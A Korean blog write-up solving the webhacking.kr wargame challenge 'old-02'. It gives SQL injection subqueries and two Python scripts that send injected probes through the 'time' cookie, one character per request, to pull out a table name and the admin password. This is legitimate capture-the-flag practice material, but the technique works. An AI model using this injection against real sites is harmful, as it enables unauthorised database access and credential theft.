old-02

chwrld·2025년 6월 21일

webhacking.kr


테이블 개수 알아내기

(select count(table_name) from information_schema.tables where table_schema=database())
-> 2

테이블 이름 길이 추출

(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)
-> 13
(select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)
-> 3

테이블 이름 추출

(SELECT ASCII(SUBSTRING(table_name,1,1)) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1)
-> extract_table_name.py

# extract_table_name.py
import re
import requests
from bs4 import BeautifulSoup, Comment

url = 'https://webhacking.kr/challenge/web-02/'

table_name = ''
# Table-name length obtained in the earlier LENGTH() probe of the writeup.
length = 13

# The page answers each probe with a timestamp inside an HTML comment
# (format YYYY-MM-DD HH:MM:SS); only the minute/second part is used below.
_TIMESTAMP_RE = re.compile(r'(\d{4}-\d{2}-\d{2})\s+(\d{2}):(\d{2}):(\d{2})')


def _value_from_comments(comment_nodes):
    """Return mm*60 + ss of the first timestamp-looking comment, else None.

    The hour field is intentionally discarded, exactly as in the original
    loop; the encoded value is assumed to fit in minutes and seconds.
    """
    for node in comment_nodes:
        found = _TIMESTAMP_RE.search(node)
        if found is None:
            continue
        _, minutes, seconds = (int(part) for part in found.groups()[1:])
        return minutes * 60 + seconds
    return None


for pos in range(1, length + 1):
    # One request per character position; the subquery evaluates to the
    # ASCII code of the pos-th character of the first table name.
    probe = (
        f"(SELECT ASCII(SUBSTRING(table_name,{pos},1)) "
        "FROM information_schema.tables "
        "WHERE table_schema=DATABASE() "
        "LIMIT 0,1"
        ")-- -"
    )
    response = requests.get(url, cookies={'time': probe})
    page = BeautifulSoup(response.text, 'html.parser')

    # Only HTML comment nodes carry the timestamp we read back.
    comment_nodes = page.find_all(string=lambda text: isinstance(text, Comment))
    # Example nodes seen on the page: '\n2070-01-01 09:01:59\n', ' if you access admin.php ... '
    ts = _value_from_comments(comment_nodes)
    if ts is None:
        raise ValueError(f"#{pos}: 타임스탬프 주석을 못 찾았습니다.")

    ch = chr(ts)
    table_name += ch
    print(f"#{pos} → ASCII {ts} → '{ch}'")

print("추출된 테이블명:", table_name)

컬럼 개수 추출

(SELECT count(column_name) from information_schema.columns WHERE table_name="admin_area_pw")
-> 1

컬럼 이름 길이 추출

(SELECT length(column_name) from information_schema.columns WHERE table_name="admin_area_pw")
-> 2

컬럼 이름 추출

(SELECT ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE table_name="admin_area_pw")
-> 112, 119 => 'pw'

pw 컬럼 데이터 길이 추출

SELECT length(pw) from admin_area_pw
-> 17

pw 컬럼 데이터 추출

(SELECT ASCII(SUBSTRING(pw, 1, 1)) FROM admin_area_pw)
-> extract_pw.py

# extract_pw.py
import re
import requests
from bs4 import BeautifulSoup, Comment

url = 'https://webhacking.kr/challenge/web-02/'

pw = ''
# Length of the pw column value found by the earlier LENGTH(pw) probe.
length = 17

# Timestamp comment emitted by the page (YYYY-MM-DD HH:MM:SS); the value
# is recovered from the minute and second fields only.
_TIMESTAMP_RE = re.compile(r'(\d{4}-\d{2}-\d{2})\s+(\d{2}):(\d{2}):(\d{2})')


def _value_from_comments(comment_nodes):
    """Return mm*60 + ss of the first timestamp-looking comment, else None.

    The hour field is ignored on purpose, matching the original loop.
    """
    for node in comment_nodes:
        found = _TIMESTAMP_RE.search(node)
        if found is None:
            continue
        _, minutes, seconds = (int(part) for part in found.groups()[1:])
        return minutes * 60 + seconds
    return None


for pos in range(1, length + 1):
    # One request per character position; the subquery yields the ASCII
    # code of the pos-th character of pw.
    probe = (
        f"(SELECT ASCII(SUBSTRING(pw, {pos}, 1)) "
        "FROM admin_area_pw)"
    )
    response = requests.get(url, cookies={'time': probe})
    page = BeautifulSoup(response.text, 'html.parser')

    # Only HTML comment nodes are inspected for the timestamp.
    comment_nodes = page.find_all(string=lambda text: isinstance(text, Comment))
    # Example nodes seen on the page: '\n2070-01-01 09:01:59\n', ' if you access admin.php ... '
    ts = _value_from_comments(comment_nodes)
    if ts is None:
        raise ValueError(f"#{pos}: 타임스탬프 주석을 못 찾았습니다.")

    ch = chr(ts)
    pw += ch
    print(f"#{pos} → ASCII {ts} → '{ch}'")

print("추출된 pw:", pw)